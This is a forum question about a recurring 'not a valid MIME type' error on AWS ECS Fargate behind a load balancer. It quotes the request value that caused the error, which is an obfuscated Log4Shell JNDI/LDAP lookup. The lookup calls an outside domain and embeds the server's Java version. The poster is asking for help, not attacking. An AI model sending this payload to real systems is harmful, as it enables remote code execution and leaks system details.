# Mimetype is not valid - ECS Fargate with Application Load Balancer

Tags: amazon-ecs, aws-fargate

I keep seeing this weird mime type text errors in our servers once in a day. We are using ECS Fargate containers behind an application load balancer.

`"${${5ia:l2:-j}${bovm:-n}${q9w8:j:-d}${p5v0:g:it8m:-i}${g47v:-:}${0:t:-l}${05:n:7bf:-d}${0q3v:-a}${ct:1l:xcqj:-p}${dvts:bq:-:}${i:hln:17:-/}${bta:5wfu:-/}${z7:okt:mqz5:-c}${tdn0:-t}${cux5:-l}${dnfs:-0}${j3re:-c}${bmgv:5w3:--}${${6dsm:-s}${t:ovam:-y}${boe:-s}${5:-:}${5j:4w:-j}${fc:ol:-a}${ev7:561b:6ev:-v}${ry:8qg:-a}${7:g:e:-.}${r:-v}${wgcn:u:a8gy:-e}${vglm:clxj:zjl3:-r}${17:-s}${dt:-i}${d3qf:n:6:-o}${3yjc:-n}}${qegs:kr:t5:-.}${l7:8f5:-8}${w1:-7}${y9:9:e5:-2}${9r4:ulx:hry:-d}${m0bn:1:slw:-e}${7bv:-0}${240p:-e}${l:-a}${3h:7tef:-b}${yn:4k:-2}${4p:-6}${kr:klg:mvh3:-e}${nb85:81:-9}${728:fh4:e:-b}${uaer:7p8i:3:-6}${r:sn2r:p:-d}${9:-8}${i38b:-2}${jsy:-1}${c:-7}${ec:-4}${hzbp:7yq:-5}${6:b3k:-0}${f:-0}${1j:-a}${ck:-d}${zo4w:l:6vn:-7}${s:-0}${m6g:9rhw:529:-3}${dkqr:7xh:li:-f}${jvkf:-b}${t:-d}${l1h0:fjhe:se8m:-3}${xfe:s0e:9yw:-3}${ivj:-8}${yi8:7:-f}${umal:-d}${cau:-9}${5w:pw:3:-0}${ca:o6ly:-e}${g9:<NUMBER>:-2}${pgsc:j:-a}${v:-.}${ahv:5:-z}${4:-.}${fud:p:pc4b:-7}${32:5r:wp:-b}${sol:qwcd:-a}${u:xc15:6:-e}${m1:-.}${i9:uly7:spr:-x}${qcf8:eqtr:lf1j:-y}${zc:4an:-z}}" is not a valid MIME type`

What does this mean? are the servers being hit with some unknown clients with intent of hacking/stealing data ?

Only pattern I noticed is that this happens once in a day, almost at exactly same time. I wonder if this is also related to some internal ECS related thing?